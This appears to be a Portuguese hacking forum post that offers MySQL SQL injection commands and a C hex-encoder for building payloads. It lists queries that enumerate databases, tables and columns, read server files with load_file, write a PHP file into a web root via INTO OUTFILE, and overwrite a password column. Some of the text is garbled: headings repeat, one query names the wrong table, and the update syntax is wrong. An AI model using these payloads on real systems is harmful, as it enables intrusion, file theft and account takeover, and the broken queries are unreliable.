Existem mais de um milhão de tutos sobre sqli em mysql , isso aki é so um dica de alguns comandos uteis, pode ser usado quando a versão do mysql é acima da 5.0
descobrir o nome dos db's:
descobrir tabelas de um db:
descobrir colunas de uma tabela:
Ler arquivos do server
Criar arquivo no server:
alterar valor de uma coluna:
Você pode usar o count(*) para descobrir quantos databases , tabelas e colunas existem , eu eskeci qual é o comando pra ver qual é o tipo de dados (tinyint,smallint,float,char,varchar,text,etc ...) se eu lembrar eu edito o post '-'
source de hex-encode:
descobrir o nome dos db's:
select group_concat(schema_name) from information_schema.schemata
descobrir tabelas de um db:
select group_concat(table_name) from information_schema.tables where table_schema=nome_do_db_encodado_em_hex_0x61
descobrir colunas de uma tabela:
select group_concat(column_name) from information_schema.tables where table_name=nome_da_tabela_encodada_em_hex_0x61 AND table_schema=nome_do_db_encodado_em_hex_0x61
Ler arquivos do server
select load_file(nome_do_arquivo_em_hex_0x61)
Criar arquivo no server:
select '<?php phpinfo(); ?>' INTO OUTFILE '/home/site/public_html/out.php'
alterar valor de uma coluna:
set tabela update coluna='novo_valor'
exe: set usuarios update senha='nova_senha'
Você pode usar o count(*) para descobrir quantos databases , tabelas e colunas existem , eu eskeci qual é o comando pra ver qual é o tipo de dados (tinyint,smallint,float,char,varchar,text,etc ...) se eu lembrar eu edito o post '-'
source de hex-encode:
#include <stdio.h>
void hex(char *buffer){
int x;
printf("[*] hex: 0x");
for(x=0;x<strlen(buffer);x++){
printf("%x", buffer[x]);
}
printf("\n\n");
return;
}
int main(int argc, char **argv){
if(!argv[1]){
printf("\n\n[ DOMLABS NEVER DIE ]\n\n");
printf("[*] usage: %s <text_to_encode>\n\n", argv[0]);
return 0;
}
printf("[*] text to encode: %s\n", argv[1]);
hex(argv[1]);
return 0;
}